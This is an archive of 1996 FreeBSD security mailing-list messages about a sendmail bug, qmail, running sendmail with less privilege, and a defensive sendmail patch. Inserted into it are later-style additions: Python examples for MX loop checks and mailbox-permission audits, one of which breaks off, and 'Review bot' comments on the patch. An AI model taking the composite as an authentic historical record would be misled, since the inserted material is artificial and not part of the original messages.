From owner-freebsd-security Sun Nov 17 12:20:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA13049 for security-outgoing; Sun, 17 Nov 1996 12:20:36 -0800 (PST) Received: from ingenieria ([168.176.15.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id MAA13043 for ; Sun, 17 Nov 1996 12:20:24 -0800 (PST) Received: from unalmodem.usc.unal.edu.co by ingenieria (SMI-8.6/SMI-SVR4) id PAA21345; Sun, 17 Nov 1996 15:20:09 +0600 Message-ID: <328F95E2.611C@ingenieria.ingsala.unal.edu.co> Date: Sun, 17 Nov 1996 14:46:58 -0800
From: "Pedro Giffuni S." Reply-To: pgiffuni@fps.biblos.unal.edu.co Organization: Universidad Nacional de Colombia X-Mailer: Mozilla 3.0 (Win16; I) MIME-Version: 1.0 To: Adam Shostack CC: Will Brown , freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). References: <199611171618.LAA02721@homeport.org> Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

Adam Shostack wrote:
>
> On another note, how about qmail replacing sendmail?
>
> Adam
>

I'm also getting tired of closing sendmail's holes :(, I tried qmail
under AIX 4.1 once, it compiled fine but it didn't work. Since deleting
users is more boring under FreeBSD than in AIX, and since I didn't have
anything important on PCs I didn't try qmail there, but I have seen in
postings that it's really secure.

qmail has a home page somewhere, I have a copy on my ftp site. I can look
if you need it. It would be good to have a port.

Pedro.

From owner-freebsd-security Sun Nov 17 13:58:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA17085 for security-outgoing; Sun, 17 Nov 1996 13:58:07 -0800 (PST) Received: from lucy.az.com (lucy.az.com [204.57.139.2]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id NAA17077 for ; Sun, 17 Nov 1996 13:57:54 -0800 (PST) Received: (from yankee@localhost) by lucy.az.com (8.6.12/8.6.12) id NAA22862; Sun, 17 Nov 1996 13:56:57 -0800 Date: Sun, 17 Nov 1996 13:56:56 -0800 (PST)
From: "az.com" To: freebsd-security@FreeBSD.ORG Subject: grand alternatives to chroot, solution to the age-old root problem In-Reply-To: <199611040327.TAA10276@salsa.gv.ssi1.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

Has anyone considered enabling 'virtual-machines' on UNIX?

Why not dedicate a physical machine to this purpose and firewall it off
from the rest by making each virtual machine appear to be gateway'd via a
point-point connection to the main subnet. Each user telnets into a unix
logical "machine" with a distinct IP address of their own. The 'mother'
kernel above provides a socket to the IP world disallowing sniffing and
also provides a bandwidth usage auditor and choke. (It looks like a
completely separate box with its own init, etc.) Each user gets complete
control in their own machine with access to their web server, programs,
etc.

No longer do you have to worry about whether they have root or not - in
fact each user gets to be root! (in their own machine, of course ;) ) If
they want to hack, get fancy, reboot, etc. - it's up to them - it's *their*
system, not yours.

If they blow out the virtual OS space because they gave their password out
to a grommet or made a mistake, you simply run a utility which checks and
repairs virtual file system's partitions and refreshes the virtual
'environment's' OS from a template.
Dan From owner-freebsd-security Sun Nov 17 14:21:59 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA18187 for security-outgoing; Sun, 17 Nov 1996 14:21:59 -0800 (PST) Received: from garrison.inetcan.net (root@garrison.inetcan.net [206.186.215.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA18170 for ; Sun, 17 Nov 1996 14:21:34 -0800 (PST) Received: (from dreamer@localhost) by garrison.inetcan.net (8.7.6/8.7.3) id PAA01780; Sun, 17 Nov 1996 15:21:49 -0700 Date: Sun, 17 Nov 1996 15:21:49 -0700 (MST) From: Digital Dreamer To: pgiffuni@fps.biblos.unal.edu.co cc: Adam Shostack , Will Brown , freebsd-security@FreeBSD.ORG Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <328F95E2.611C@ingenieria.ingsala.unal.edu.co> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Sun, 17 Nov 1996, Pedro Giffuni S. wrote: > Adam Shostack wrote: > > > > On another note, how about qmail replacing sendmail? > > > > Adam > > > qmail has a homee page some where, I have a copy on my ftp site..I can > look if you need it. The homepage is at http://www.pobox.com/~qmail/software.html. dreamer From owner-freebsd-security Sun Nov 17 14:29:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id OAA18557 for security-outgoing; Sun, 17 Nov 1996 14:29:37 -0800 (PST) Received: from garrison.inetcan.net (dreamer@garrison.inetcan.net [206.186.215.2]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id OAA18515 for ; Sun, 17 Nov 1996 14:28:45 -0800 (PST) Received: (from dreamer@localhost) by garrison.inetcan.net (8.7.6/8.7.3) id PAA01894; Sun, 17 Nov 1996 15:31:16 -0700 Date: Sun, 17 Nov 1996 15:31:15 -0700 (MST) 
From: Digital Dreamer To: "az.com" cc: freebsd-security@freebsd.org Subject: Re: grand alternatives to chroot, solution to the age-old root problem In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

On Sun, 17 Nov 1996, az.com wrote:

> No longer do you have to worry about whether they have root or not - in
> fact each user gets to be root! (in their own machine, of course ;) ) If
> they want to hack, get fancy, reboot, etc. - its up to them - its *their*
> system, not yours.
>
> If they blow out the virtual OS space because they gave their password out
> to a grommet or made a mistake, you simply run a utility which checks and
> repairs virtual file system's partitions and refreshes the virtual
> 'environment's' OS from a template.

Sounds nice, but kind of impractical. There's no unice (AFAIK) whose
kernel could do this without essentially being rewritten. Besides,
there's still the possibility of kernel bugs that would let you break out
of your vm and get into that of others.

dreamer
To: Digital Dreamer
Cc: "az.com", freebsd-security@FreeBSD.org
Subject: Re: grand alternatives to chroot, solution to the age-old root problem
From: Assar Westerlund
Date: 18 Nov 1996 01:02:56 +0100
In-Reply-To: Digital Dreamer's message of Sun, 17 Nov 1996 15:31:15 -0700 (MST)
Message-ID: <5l20dss21b.fsf@assaris.sics.se>

Digital Dreamer writes:
> On Sun, 17 Nov 1996, az.com wrote:

[ about virtual machines ]

> Sounds nice, but kind of impractical. There's no unice (AFAIK) whose
> kernel could do this without essentially being rewritten. Besides,
> there's still the possibility of kernel bugs that would let you break out
> of your vm and get into that of others.

Sounds like Fluke, but they have/will have recursive virtual machines.

/assar

From: Adam Shostack
Message-Id: <199611180005.TAA09457@homeport.org>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To: <328F95E2.611C@ingenieria.ingsala.unal.edu.co> from "Pedro Giffuni S." at "Nov 17, 96 02:46:58 pm"
To: pgiffuni@fps.biblos.unal.edu.co
Date: Sun, 17 Nov 1996 19:05:45 -0500 (EST)
Cc: freebsd-security@FreeBSD.org

Pedro Giffuni S. wrote:
[Charset iso-8859-1 unsupported, filtering to ASCII...]
| Adam Shostack wrote:
| >
| > On another note, how about qmail replacing sendmail?

| qmail has a home page somewhere, I have a copy on my ftp site..I can
| look if you need it.
| It would be good to have a port.

www.qmail.org

	My suggestion was a little further reaching than that; I'm
planning to replace sendmail with qmail real soon, and that helps me a
lot.  My suggestion was meant to imply the possibility of removing
sendmail from the FreeBSD distribution, and only shipping qmail.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
					       -Hume

To: Adam Shostack
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org
In-reply-to: Your message of "Sun, 17 Nov 1996 19:05:45 EST."
    <199611180005.TAA09457@homeport.org>
References: <199611180005.TAA09457@homeport.org>
Date: Sun, 17 Nov 1996 17:49:47 -0700
From: Warner Losh

In message <199611180005.TAA09457@homeport.org> Adam Shostack writes:
: 	My suggestion was meant to imply the possibility of removing
: sendmail from the FreeBSD distribution, and only shipping qmail.

I think that would be ill-advised.  There are many other good, worthy
mailers than just sendmail and qmail (exim and smail come to mind).
Sendmail is well understood and well maintained with a very long track
record.  Other mailers, no matter how much better, don't match this
track record.

Or more succinctly:  Better the devil you know...

Warner

From: batie@agora.rdrop.com (Alan Batie)
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
To: imp@village.org (Warner Losh)
Date: Sun, 17 Nov 1996 17:16:36 -0800 (PST)
Cc: adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org
In-Reply-To: from "Warner Losh" at Nov 17, 96 05:49:47 pm

> Sendmail is well understood and well maintained with a very long track
> record.  Other mailers, no matter how much better, don't match this
> track record.

Yup, sendmail has a long track record of the "security hole of the month";
I've yet to see one for smail.  I would like to switch to sendmail, as I
hear it deals with mail queues a lot better these days, and smail
development seems to have gone into a black hole, but until sendmail can
make it a whole month or two without a CERT advisory on it...

--
Alan Batie                     ______
batie@agora.rdrop.com          \    /     Assimilate this!
+1 503 452-0960                 \  /        --Worf, First Contact
DE 3C 29 17 C0 49 7A 27          \/
40 A5 3C 37 4A DA 52 B9

It is my policy to avoid purchase of any products from companies which
use unrequested email advertisements or telephone solicitation.

From: Don Lewis
Message-Id: <199611180134.RAA14418@salsa.gv.ssi1.com>
Date: Sun, 17 Nov 1996 17:34:25 -0800
In-Reply-To: Adam Shostack "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 17, 7:05pm)
To: Adam Shostack, pgiffuni@fps.biblos.unal.edu.co
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: freebsd-security@FreeBSD.org

On Nov 17, 7:05pm, Adam Shostack wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} Pedro Giffuni S. wrote:
} [Charset iso-8859-1 unsupported, filtering to ASCII...]
} | Adam Shostack wrote:
} | >
} | > On another note, how about qmail replacing sendmail?
}
} | qmail has a home page somewhere, I have a copy on my ftp site..I can
} | look if you need it.
} | It would be good to have a port.
}
} www.qmail.org
}
} 	My suggestion was a little further reaching than that; I'm
} planning to replace sendmail with qmail real soon, and that helps me a
} lot.  My suggestion was meant to imply the possibility of removing
} sendmail from the FreeBSD distribution, and only shipping qmail.

Qmail doesn't do all the ESMTP negotiation that sendmail does.  It
keeps qmail simpler and less likely to be buggy, but not as functional.
For instance sendmail 8.7.x supports: 8BITMIME, SIZE, DSN, VERB, ONEX,
but whatever version of qmail I just checked only supports 8BITMIME and
PIPELINING.  Sendmail 8.8.x adds ETRN.

Qmail wants to look up the addresses of all the hosts listed in the MX
records for an address so that it can compare them with the addresses
of the host.  This fixes the problem of "mail loops back to myself" that
you get when you misconfigure DNS and/or sendmail, but I think it means
that if qmail can't get the address of the most preferred MX host, it
can't forward the message to any of the other mail exchangers because
this could cause the message to loop.
Sendmail's support of UUCP isn't wonderful (mostly a problem of getting
DNS totally disabled).  How well does qmail support UUCP?

If you sent a message to ten different people at the same machine, qmail
likes to send ten individual copies, even though this might be a large
message and the link expensive (I believe this feature can be turned
off).  If you send a message to two people at two different addresses
that have the same set of MX records, sendmail will send one copy of the
message and let the mail exchanger at the other end duplicate the message
(but this adds the latency of the second DNS lookup to the delivery of
the first message).

Other than the above, I think that qmail has a lot of advantages.

			---
Truck

Message-Id: <199611180225.FAA01413@nagual.ru>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To: <199611180134.RAA14418@salsa.gv.ssi1.com> from "Don Lewis" at "Nov 17, 96 05:34:25 pm"
To: Don.Lewis@tsc.tdk.com (Don Lewis)
Date: Mon, 18 Nov 1996 05:25:19 +0300 (MSK)
Cc: adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.org
From: Андрей Чернов (Andrey A. Chernov)

> Sendmail's support of UUCP isn't wonderful (mostly a problem of
> getting DNS totally disabled).  How well does qmail support UUCP?

It is possible to totally disable DNS via /etc/service.switch:

# To disable DNS search for sendmail
hosts	files

--
Andrey A. Chernov
http://www.nagual.ru/~ache/

To: batie@agora.rdrop.com (Alan Batie)
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org
In-reply-to: Your message of "Sun, 17 Nov 1996 17:16:36 PST."
Date: Sun, 17 Nov 1996 19:46:30 -0700
From: Warner Losh

In message Alan Batie writes:
: Yup, sendmail has a long track record of the "security hole of the month";
: I've yet to see one for smail.  I would like to switch to sendmail, as I
: hear it deals with mail queues a lot better these days, and smail
: development seems to have gone into a black hole, but until sendmail can
: make it a whole month or two without a CERT advisory on it...

I've yet to see a CERT advisory on VMS, yet it has dozens of security
holes that have been discussed in other lists.  Just because smail
hasn't had a CERT advisory doesn't make it secure.  Sendmail is running
on 10x or 100x more machines than smail.  Since it is running on so
many machines, it is more profitable to attack it.

Also, CERT advisories generally cover things that the vendor puts out.
If no one is the smail vendor, then it becomes harder to put out a CERT
advisory on it.

smail, exim, and qmail should be ports that people that are security
minded can optionally use.  exim, for example, breaks a number of
things, but I use it anyway.

Warner

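Don Lewis's post earlier in this thread describes an MTA (his reading of qmail) resolving every host in a destination's MX set and comparing the addresses with its own before relaying, and his suspicion that one unresolvable preferred MX then blocks forwarding to the others. The block below is an added example, not code from qmail, sendmail or FreeBSD: a relay-target selection that never relays to itself or to a less preferred exchanger and, in strict mode, defers when a candidate MX host fails to resolve, because the unresolved host could be this very machine and forwarding would loop. The MX records, addresses and the resolver are constructed stand-ins (no live DNS), and the `strict=False` switch is an assumption added to show the lenient alternative side by side.

```python
"""Relay-target selection with "mail loops back to myself" protection.

Added example for the thread above; not code from any MTA.  DNS data and
the resolver are constructed stand-ins so the example runs offline.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Set


@dataclass(frozen=True)
class MX:
    """One MX record; a lower preference value is more preferred."""
    preference: int
    host: str


class Deferred(Exception):
    """Delivery must be retried later: not enough DNS data to rule out a loop."""


def make_resolver(table: Dict[str, List[str]]) -> Callable[[str], Optional[List[str]]]:
    """Stand-in for an A-record lookup built from a constructed host -> addresses table.

    Hosts missing from the table resolve to None, modelling a lookup failure.
    """
    return lambda host: table.get(host)


def relay_targets(mxs: List[MX], local_addrs: Set[str],
                  resolve: Callable[[str], Optional[List[str]]],
                  strict: bool = True) -> List[str]:
    """Return the MX hosts this MTA may relay to, most preferred first.

    * If an MX host resolves to one of our own addresses, only hosts with a
      strictly lower preference value remain candidates; when we are the most
      preferred MX the message is local and nothing is returned.
    * strict=True (the behaviour Don attributes to qmail) defers when any
      candidate host cannot be resolved: it might be us, and relaying to a
      less preferred MX than ourselves is how loops start.
    * strict=False skips unresolved hosts, trading loop safety for delivery.
    """
    ordered = sorted(mxs, key=lambda m: (m.preference, m.host))
    addrs = {m.host: resolve(m.host) for m in ordered}

    # The most preferred MX entry that is actually this machine, if any.
    our_pref: Optional[int] = None
    for m in ordered:
        a = addrs[m.host]
        if a is not None and local_addrs.intersection(a):
            our_pref = m.preference
            break

    # Unresolved hosts only matter if they could still be relay candidates.
    unresolved = [m.host for m in ordered
                  if addrs[m.host] is None and (our_pref is None or m.preference < our_pref)]
    if unresolved and strict:
        raise Deferred("cannot resolve MX host(s): " + ", ".join(unresolved))

    targets: List[str] = []
    for m in ordered:
        if our_pref is not None and m.preference >= our_pref:
            break                      # ourselves, or less preferred than us: never relay there
        if addrs[m.host] is None:
            continue                   # lenient mode: skip what we could not resolve
        targets.append(m.host)
    return targets


def would_defer(mxs: List[MX], local_addrs: Set[str],
                resolve: Callable[[str], Optional[List[str]]]) -> bool:
    """True when strict mode would hold the message for a later retry."""
    try:
        relay_targets(mxs, local_addrs, resolve, strict=True)
    except Deferred:
        return True
    return False


if __name__ == "__main__":
    # Constructed zone: three exchangers for one domain, we are the backup.
    table = {"mx1.example.net": ["192.0.2.10"],
             "mx2.example.net": ["192.0.2.20"],
             "backup.example.net": ["192.0.2.30"]}
    mxs = [MX(30, "backup.example.net"), MX(10, "mx1.example.net"), MX(20, "mx2.example.net")]
    print(relay_targets(mxs, {"192.0.2.30"}, make_resolver(table)))
```

The strict rule is deliberately conservative: when `mx1` is missing from the table and we are the backup, `relay_targets` raises `Deferred` rather than forwarding to `mx2`, which is the availability cost Don points out; with `strict=False` the same call returns `["mx2.example.net"]`.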
From: newton@communica.com.au (Mark Newton)
Message-Id: <9611180247.AA15359@communica.com.au>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
To: batie@agora.rdrop.com (Alan Batie)
Date: Mon, 18 Nov 1996 13:17:21 +1030 (CST)
Cc: imp@village.org, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org
In-Reply-To: from "Alan Batie" at Nov 17, 96 05:16:36 pm

Alan Batie wrote:

> > Sendmail is well understood and well maintained with a very long track
> > record.  Other mailers, no matter how much better, don't match this
> > track record.
>
> Yup, sendmail has a long track record of the "security hole of the month";
> I've yet to see one for smail.  I would like to switch to sendmail, as I
> hear it deals with mail queues a lot better these days, and smail
> development seems to have gone into a black hole, but until sendmail can
> make it a whole month or two without a CERT advisory on it...

Of course, one of the main reasons why sendmail is so "dangerous" is that
despite fifteen years of it-hurts-when-I-do-this style experience, we
*still* run it as root!

Why do we do this?  Why does nobody understand that a UNIX process can't
just gratuitously gain privileges unless some other privileged program
gives them away?  Given sendmail's history, why do so many people still
trust it with root privileges when it doesn't actually need them?!

sendmail really only needs root so that it can bind to the "privileged"
port 25 when it's running in daemon mode.  If you frob filesystem permissions
sufficiently you can get away without providing sendmail with root
privileges by running it with a non-root uid out of inetd (which is,
indeed, precisely what I have done with it here at Communica, where
sendmail runs as the unprivileged "smtp" user).
Tradeoff:  High-volume sites will not like the fact that it doesn't run
as a daemon, because it has extra overhead associated with fork()/exec()
from inetd.  On the other hand, the fact that it a) isn't running as a
daemon here; and b) wouldn't have any scary privileges if it did has
given me a warm fuzzy glow in the context of the latest bug.

    - mark

---
Mark Newton                               Email: newton@communica.com.au
Systems Engineer                          Phone: +61-8-8373-2523
Communica Systems                         WWW:   http://www.communica.com.au

To: newton@communica.com.au (Mark Newton)
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: batie@agora.rdrop.com (Alan Batie), adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org
In-reply-to: Your message of "Mon, 18 Nov 1996 13:17:21 +1030." <9611180247.AA15359@communica.com.au>
References: <9611180247.AA15359@communica.com.au>
Date: Sun, 17 Nov 1996 19:55:10 -0700
From: Warner Losh

In message <9611180247.AA15359@communica.com.au> Mark Newton writes:
: sendmail really only needs root so that it can bind to the "privileged"
: port 25 when it's running in daemon mode.  If you frob filesystem permissions
: sufficiently you can get away without providing sendmail with root
: privileges by running it with a non-root uid out of inetd (which is,
: indeed, precisely what I have done with it here at Communica, where
: sendmail runs as the unprivileged "smtp" user).

I don't buy this.  You need to be able to create a mailbox of an
arbitrary user, and then write to that mailbox with that user's uid,
or to a shell of that user's uid.  To do otherwise would introduce
other security problems, some of which have been beat to death in the
freebsd lists.

What am I missing?

Warner

From: Adam Shostack
Message-Id: <199611180259.VAA10674@homeport.org>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To: from Warner Losh at "Nov 17, 96 07:55:10 pm"
To: imp@village.org (Warner Losh)
Date: Sun, 17 Nov 1996 21:59:29 -0500 (EST)
Cc: freebsd-security@freebsd.org

Warner Losh wrote:
| In message <9611180247.AA15359@communica.com.au> Mark Newton writes:
| : sendmail really only needs root so that it can bind to the "privileged"
| : port 25 when it's running in daemon mode.  If you frob filesystem permissions
| : sufficiently you can get away without providing sendmail with root
| : privileges by running it with a non-root uid out of inetd (which is,
| : indeed, precisely what I have done with it here at Communica, where
| : sendmail runs as the unprivileged "smtp" user).
|
| I don't buy this.  You need to be able to create a mailbox of an
| arbitrary user, and then write to that mailbox with that user's uid,
| or to a shell of that user's uid.  To do otherwise would introduce
| other security problems, some of which have been beat to death in the
| freebsd lists.

	Sendmail doesn't need to create/write to mailboxes; mail.local*
needs to do that.

	The problem with sendmail is that it's a dessert topping and a
floor wax.  It wants to do everything, and you can't do everything and
be secure.  There's no solid separation of privilege (as enforced by
qmail's multiple programs under different uids).  There's no least
privilege, as seen with qmail's one of 14 programs being setuid.  The
need for a setuid program to deliver mail does not mean that the mail
parser, the MX handler, the envelope mangler, and the router core need
to be setuid.

*procmail, qmail-lspawn can substitute for mail.local.
Adam

--
"It is seldom that liberty of any kind is lost all at once."
					       -Hume

From: igor@alecto.physics.uiuc.edu (Igor Roshchin)
Message-Id: <199611180312.VAA27437@alecto.physics.uiuc.edu>
Subject: Re: New sendmail bug...
To: roberto@keltia.freenix.fr (Ollivier Robert), eric@sendmail.org
Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST)
Cc: freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org
In-Reply-To: from "Ollivier Robert" at Nov 17, 96 12:58:53 pm

Hello!

Maybe I am missing something, but I was not able to compile the patched
version of the sendmail 8.7.6.4, as it appears in the FreeBSD distribution
(sup.freebsd.org).

main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segment
*** Error code 1

Is it a problem due to the version of FreeBSD?
I tried it on 2.1.5-stable and 2.1.5-release; the results were the same.

Thanks in advance for your suggestions.

IgoR

>
> ------- main.c -------
> *** -	Wed Dec 31 16:00:00 1969
> --- main.c	Sat Nov 16 07:07:17 1996
> ***************
> *** 493,507 ****
>   	{
>   	  case MD_DAEMON:
>   	  case MD_FGDAEMON:
> ! # ifdef DAEMON
> ! 		if (RealUid != 0)
> ! 		{
> ! 			usrerr("Permission denied");
> ! 			exit(EX_USAGE);
> ! 		}
> ! 		vendor_daemon_setup(CurEnv);
> ! 		/* fall through ... */
> ! # else
>   		usrerr("Daemon mode not implemented");
>   		ExitStat = EX_USAGE;
>   		break;
> --- 493,499 ----
>   	{
>   	  case MD_DAEMON:
>   	  case MD_FGDAEMON:
> ! # ifndef DAEMON
>   		usrerr("Daemon mode not implemented");
>   		ExitStat = EX_USAGE;
>   		break;
> ***************
> *** 899,904 ****
> --- 891,904 ----
>   		/* fall through ... */
>
>   	  case MD_DAEMON:
> + 		/* check for permissions */
> + 		if (RealUid != 0)
> + 		{
> + 			usrerr("Permission denied");
> + 			exit(EX_USAGE);
> + 		}
> + 		vendor_daemon_setup(CurEnv);
> +
>   		/* remove things that don't make sense in daemon mode */
>   		FullName = NULL;
>   		GrabTo = FALSE;
> ***************
> *** 1932,1937 ****
> --- 1932,1946 ----
>   		syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]);
>   #endif
>   		releasesignal(SIGHUP);
> + 		if (setuid(RealUid) < 0 || setgid(RealGid) < 0)
> + 		{
> + #ifdef LOG
> + 			if (LogLevel > 0)
> + 				syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m",
> + 					RealUid, RealGid);
> + #endif
> + 			exit(EX_OSERR);
> + 		}
>   		execv(SaveArgv[0], (ARGV_T) SaveArgv);
>   #ifdef LOG
>   		if (LogLevel > 0)
>
>

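Review bot: the first hunk (lines 493-507) removes the RealUid check and the vendor_daemon_setup() call from the mode switch and keeps only the `# ifndef DAEMON` error arm, so with DAEMON defined that case body is now empty and falls through where the deleted `/* fall through ... */` arm did; a one-line comment there saying the permission check has moved to the MD_DAEMON handling near line 891 (second hunk) would stop a later reader from reintroducing it at this point, and the change description should state why the check could not stay here.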
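Review bot: the relocated check in the second hunk (lines 891-904) sits under `case MD_DAEMON:` only, while the one it replaces covered both MD_DAEMON and MD_FGDAEMON; the `/* fall through ... */` context line just above shows another case lands here, so confirm that case is MD_FGDAEMON, otherwise foreground daemon mode is left without the RealUid test. The `vendor_daemon_setup(CurEnv)` call is also no longer inside `#ifdef DAEMON` and presumes the function exists in this main.c; the undefined-symbol link error Igor reports above is what applying the hunk to a tree without that function produces, so the patch should say which sendmail version it is against.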
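Review bot: in the third hunk (lines 1932-1946) the privilege drop before `execv()` calls `setuid(RealUid)` first and `setgid(RealGid)` second; the conventional order is group first, because once the effective uid is non-zero a setgid() can only select the real or saved gid. Here RealGid is the real gid, so the call still succeeds, but swapping the two keeps the pattern from being copied somewhere it would fail (the `||` short-circuit also means a setgid() failure is only noticed after the uid has already changed). The `exit(EX_OSERR)` on failure is right: the re-exec of SaveArgv[0] must never proceed with the ids only partly dropped, and since a root-started daemon has RealUid == 0, setuid(0) is a no-op there and the restart behaviour for root is unchanged.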
From: newton@communica.com.au (Mark Newton)
Message-Id: <9611180312.AA15775@communica.com.au>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
To: imp@village.org (Warner Losh)
Date: Mon, 18 Nov 1996 13:42:43 +1030 (CST)
Cc: newton@communica.com.au, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org
In-Reply-To: from "Warner Losh" at Nov 17, 96 07:55:10 pm

Warner Losh wrote:

> In message <9611180247.AA15359@communica.com.au> Mark Newton writes:
> : sendmail really only needs root so that it can bind to the "privileged"
> : port 25 when it's running in daemon mode.  If you frob filesystem permissions
> : sufficiently you can get away without providing sendmail with root
> : privileges by running it with a non-root uid out of inetd (which is,
> : indeed, precisely what I have done with it here at Communica, where
> : sendmail runs as the unprivileged "smtp" user).
>
> I don't buy this.  You need to be able to create a mailbox of an
> arbitrary user,

Garbage.  You can create the mailbox at the same time that you create the
user (as part of the adduser script).  Set the mailbox's gid to "smtp" and
run sendmail with the "smtp" gid (actually, I don't do this on our gateway
machine at Communica:  Nobody ever logs in to it, nobody ever receives mail
on it, sendmail is configured to forward "local" mail to an internal host;
special privileges to write local mailboxes aren't needed, so sendmail
doesn't get them given to it).

> and then write to that mailbox with that user's uid,

No, write to the mailbox with the "smtp" gid (created for the purpose);
The mailbox will already be owned by the destination user as part of the
creation process.
Remember, I did say that appropriate filesystem permission frobbing was
necessary for this to work.  Filesystem permissions for mail have never
been something we've needed to worry about before because sendmail's bogus
privilege level lets it ignore them all!  This is the precise root cause
of all of sendmail's security bugs throughout its entire history.

> or to a shell of that user's uid.

You allow shell escapes?  I prefer an administrative model where the
system administrator gets to decide who can run programs on the local
host, rather than the users themselves.  You don't let pleb users create
files in a system's cgi-bin directory, why should you let them run
commands out of their .forward files?  Isn't sendmail a program used for
transferring mail, rather than a program used to allow any user on the
Internet to execute arbitrary commands on your system?

Removing shell escapes from .forward is, IMHO, of a similar league to
disabling the functionality of .rhosts files.  Shell escapes are, and
always have been, a feature which permits unaccountable abuses of security
to provide "ease of use" which only a small subset of users really care
about.

> To do otherwise would introduce
> other security problems, some of which have been beat to death in the
> freebsd lists.

I don't geddit.  You're suggesting that taking privileges sendmail doesn't
need away from it introduces more security problems than letting it run as
root 24 hours per day?  Doesn't the CERT archive provide you with ample
empirical evidence to suggest that that claim is bogus?

If sendmail's security is broken, I'd prefer to limit the damage to
sendmail's realm of influence.  Under the default configuration, if
sendmail's security is broken the entire system falls victim to the
attack.  Personally, if someone is going to break into my gateway host
I'd prefer them to do it as the smtp user (cf. "nobody") rather than the
root user.
For the *extremely* small subset of tasks for which sendmail requires root
privileges to accomplish, I'd prefer to modify sendmail so that it can
accomplish them in a different way rather than just admit defeat and let
sendmail have the privileges on a permanent basis.  Letting it have root
24 hours per day is, In My Humble Experience, just asking for trouble.

> What am I missing?

Compartmentalization, I think.

    - mark

[ tomorrow's lesson:  Why does lpd run as root? ]

---
Mark Newton                               Email: newton@communica.com.au
Systems Engineer                          Phone: +61-8-8373-2523
Communica Systems                         WWW:   http://www.communica.com.au

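The layout Mark Newton describes above (mailbox created together with the user, owned by that user, group-owned by a dedicated delivery group such as his "smtp", writable by owner and group only) only works if the permissions actually stay that way, and Adam Shostack's least-privilege point means the one component that still writes mailboxes must not be able to do anything else with that access. The checker below is an added example, not code from the thread, from sendmail or from any of the MTAs named: it audits a spool directory against that model and flags the cases a delivery agent running with group rather than root privilege must not be tricked by, such as a planted symlink or a world-writable file. The uid table, the delivery gid and the scratch spool in `demo()` are constructed stand-ins; on a real host you would map names with `pwd`/`grp` and point it at the system spool.

```python
"""Audit a mail spool against a user-owned, group-delivered mailbox model.

Added example for the thread above; not code from sendmail, mail.local or
qmail.  The demo builds its own scratch spool so it runs anywhere.
"""
import os
import shutil
import stat
import tempfile
from typing import Dict, List, Tuple

MAILBOX_MODE = 0o660   # rw for the owner and the delivery group, nothing for others


def audit_spool(spool: str, users: Dict[str, int], delivery_gid: int) -> List[Tuple[str, str]]:
    """Return (mailbox, problem) pairs for every mailbox in `spool` that breaks the model.

    `users` maps login name -> uid (pwd.getpwnam on a real system).  An empty
    result means every mailbox is a plain file owned by its user, group-owned
    by the delivery group, and exactly mode 0660.
    """
    findings: List[Tuple[str, str]] = []
    for name in sorted(os.listdir(spool)):
        st = os.lstat(os.path.join(spool, name))   # lstat: never follow a planted link
        if stat.S_ISLNK(st.st_mode):
            findings.append((name, "is a symlink; a delivery agent following it would write to its target"))
            continue
        if not stat.S_ISREG(st.st_mode):
            findings.append((name, "not a regular file"))
            continue
        uid = users.get(name)
        if uid is None:
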